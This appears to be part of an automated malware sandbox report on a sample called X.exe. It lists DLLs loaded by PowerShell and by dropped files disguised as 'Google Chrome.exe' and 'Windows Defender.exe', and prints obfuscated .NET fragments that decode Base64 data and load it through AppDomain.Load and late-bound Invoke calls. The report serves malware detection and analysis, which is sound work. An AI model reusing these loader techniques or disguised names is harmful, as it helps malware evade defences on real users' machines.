                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\X.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: X.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: X.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: X.exeStatic file information: File size 10559488 > 1048576
                        Source: X.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xa11800
                        Source: X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.OITGxfhOK68wJPCo6MtHnrlyVHyKORMPliv7ZiqCMHvzYgOkhkXsK0u8OhLgWYy0dP1KoF40Axe61GDe1t57jVm5,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._1ANXilRELSzhTddVibajQmsL6R65eHUmCCMQnnut9R9rgwYD1NjmN73hamUw91d2kZAOj5XKmA78nAeFJmPC8jmc,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._8iftPdZwa8calZ1nwsss8I1uH4v7BY6jA7ZD9hiYFnGqGZorMhCHdEamQX3IBVvF1FMWs5O7YpqBbChOltJ4KRaS,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.wESkSQlk2LTmddktYdbZYhIdpL53tC64r4K1fVruIFfyKcMGP1t2FBlv4Dk81tyYqH01deeRtH84HaYYKAIraLGI,_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.bL5SxUEmaU0P2D5c7IW69D34YGlObRx()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2],_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.AkxQRAUaBbQFqzLtkFyQDuFOWyk5dLd(Convert.FromBase64String(y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.OITGxfhOK68wJPCo6MtHnrlyVHyKORMPliv7ZiqCMHvzYgOkhkXsK0u8OhLgWYy0dP1KoF40Axe61GDe1t57jVm5,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._1ANXilRELSzhTddVibajQmsL6R65eHUmCCMQnnut9R9rgwYD1NjmN73hamUw91d2kZAOj5XKmA78nAeFJmPC8jmc,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._8iftPdZwa8calZ1nwsss8I1uH4v7BY6jA7ZD9hiYFnGqGZorMhCHdEamQX3IBVvF1FMWs5O7YpqBbChOltJ4KRaS,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.wESkSQlk2LTmddktYdbZYhIdpL53tC64r4K1fVruIFfyKcMGP1t2FBlv4Dk81tyYqH01deeRtH84HaYYKAIraLGI,_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.bL5SxUEmaU0P2D5c7IW69D34YGlObRx()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2],_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.AkxQRAUaBbQFqzLtkFyQDuFOWyk5dLd(Convert.FromBase64String(y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7 System.AppDomain.Load(byte[])
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk System.AppDomain.Load(byte[])
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7 System.AppDomain.Load(byte[])
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk System.AppDomain.Load(byte[])
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs.Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk
                        Binary or sample is protected by dotNetProtector
                        Source: X.exe, 00000000.00000000.1358812392.0000000000122000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: X.exe, 00000000.00000000.1358812392.0000000000122000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: jSystem.ComponentModelLateCallProtectorProjectByDrakeLamGZipStreamMemoryStreamProgramSystemToBooleanSystem.ComponentModel.DesignAppDomainget_CurrentDomainGetFileNameWithoutExtensionSystem.IO.CompressionMyApplicationNineRays.Obfuscator.EvaluationSystem.ReflectionExceptionProcessStartInfoDirectoryInfoSleepZYXDNGuarderResourceManagerToIntegerSystem.CodeDom.Compilerget_CurrentUserBitConverterServerComputerMyComputerClearProjectErrorSetProjectErrorGetEnumeratorActivator.ctor.cctordotNetProtectorSystem.DiagnosticsMicrosoft.VisualBasic.DevicesMyWebServicesMicrosoft.VisualBasic.ApplicationServicesSystem.Runtime.InteropServicesMicrosoft.VisualBasic.CompilerServicesSystem.Runtime.CompilerServicesMicrosoft.VisualBasic.MyServicesmqszk.ResourcesSystem.ResourcesExpandEnvironmentVariablesFileAttributesSetAttributesWriteAllBytesStringsEqualsContainsConversionsRuntimeHelpersOperatorsProcessset_ArgumentsExistsConcatConcatenateObjectSubtractObjectGetObjectMyProjectCollectSplitWaitForExitEnvironmentget_CurrentStartConvertinputMoveNext
                        Source: X.exeString found in binary or memory: dotNetProtector
                        Source: X.exeString found in binary or memory: jSystem.ComponentModelLateCallProtectorProjectByDrakeLamGZipStreamMemoryStreamProgramSystemToBooleanSystem.ComponentModel.DesignAppDomainget_CurrentDomainGetFileNameWithoutExtensionSystem.IO.CompressionMyApplicationNineRays.Obfuscator.EvaluationSystem.ReflectionExceptionProcessStartInfoDirectoryInfoSleepZYXDNGuarderResourceManagerToIntegerSystem.CodeDom.Compilerget_CurrentUserBitConverterServerComputerMyComputerClearProjectErrorSetProjectErrorGetEnumeratorActivator.ctor.cctordotNetProtectorSystem.DiagnosticsMicrosoft.VisualBasic.DevicesMyWebServicesMicrosoft.VisualBasic.ApplicationServicesSystem.Runtime.InteropServicesMicrosoft.VisualBasic.CompilerServicesSystem.Runtime.CompilerServicesMicrosoft.VisualBasic.MyServicesmqszk.ResourcesSystem.ResourcesExpandEnvironmentVariablesFileAttributesSetAttributesWriteAllBytesStringsEqualsContainsConversionsRuntimeHelpersOperatorsProcessset_ArgumentsExistsConcatConcatenateObjectSubtractObjectGetObjectMyProjectCollectSplitWaitForExitEnvironmentget_CurrentStartConvertinputMoveNext
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB67D2A5 pushad ; iretd 2_2_00007FFAAB67D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB862316 push 8B485F93h; iretd 2_2_00007FFAAB86231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB65D2A5 pushad ; iretd 6_2_00007FFAAB65D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB77123A push E95CB705h; ret 6_2_00007FFAAB771239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB7719F2 pushad ; ret 6_2_00007FFAAB7719F9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB7711FA push E95CB705h; ret 6_2_00007FFAAB771239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB842316 push 8B485F95h; iretd 6_2_00007FFAAB84231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAB67D2A5 pushad ; iretd 9_2_00007FFAAB67D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAB862316 push 8B485F93h; iretd 9_2_00007FFAAB86231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAB867BFC push esp; iretd 9_2_00007FFAAB867BFD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB66D2A5 pushad ; iretd 17_2_00007FFAAB66D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB78123A push E95CB605h; ret 17_2_00007FFAAB781239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB7811FA push E95CB605h; ret 17_2_00007FFAAB781239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB850020 push eax; iretd 17_2_00007FFAAB850039
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB8545A0 push eax; iretd 17_2_00007FFAAB8545A1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB852316 push 8B485F94h; iretd 17_2_00007FFAAB85231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB68D2A5 pushad ; iretd 20_2_00007FFAAB68D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB872316 push 8B485F92h; iretd 20_2_00007FFAAB87231B
                        Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csHigh entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                        Source: Windows Defender.exe.0.dr, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.csHigh entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                        Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                        Source: Windows Defender.exe.0.dr, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.csHigh entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                        Source: Windows Defender.exe.0.dr, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.csHigh entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
